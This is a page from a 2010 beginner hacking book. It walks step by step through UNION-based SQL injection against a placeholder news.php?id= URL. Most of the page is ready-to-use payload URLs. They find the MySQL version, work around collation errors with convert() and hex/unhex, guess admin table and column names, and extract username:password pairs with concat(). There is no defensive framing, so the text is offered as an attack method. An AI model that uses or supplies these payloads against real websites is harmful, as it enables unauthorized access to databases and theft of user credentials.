Hacking For Beginners – Manthan Desai
2010
With union we can select more data in one sql statement.
So we have http://www.site.com/news.php?id=5 union all select 1,2,3/*
(We already found that numbers of columns are 3 in section 2). if we see some numbers on screen, i.e. 1 or 2 or 3 thenthe UNION works
Step 4:- Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE: if /* not working or you get some error, then try -- it's a comment and it's important for our query to workproperly.
Let’s say that we have number 2 on the screen, now to check for version we replace the number @@version orversion () and get something like 4.1.33-log or 5.0.45 or similar.
It should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/* if you get an error"union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
I didn't see any paper covering this problem, so i must write it .
What we need is convert () functioni.e. http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* Or with hex () and unhex ()i.e.http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*And you will get MySQL version.
Step 5:- Getting table and column name
Well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <--- later I will describe for MySQL > 5 version. We must guesstable and column name in most cases. Common table names are: user/s, admin/s, and member/s ... common columnnames are: username, user, usr, username, password, pass, passwd, pwd etc...
I.e. would be http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (We see number 2 on the screen like before, and that's good )We know that table admin exists...Now to check column names. http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (If you get an error, then try the other column name)
We get username displayed on screen, example would be admin, or superadmin etc...Now to check if column password existshttp://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*(If you get an error, then try the other column name)
We seen password on the screen in hash or plain-text, it depends of how the database is set up .
i.e. md5 hash, mysql hash, sha1...Now we must complete query to look nice :)For that we can use concat () function (it joins strings)i.e.http://www.site.com/news.php?id=5 union all select 1,concat(Username, 0x3a, password),3 from admin/*Note that I put 0x3a, its hex value for: (so 0x3a is hex value for colon)(There is another way for that, char (58), ASCII value for : )
www.hackingtech.co.tv
Page 148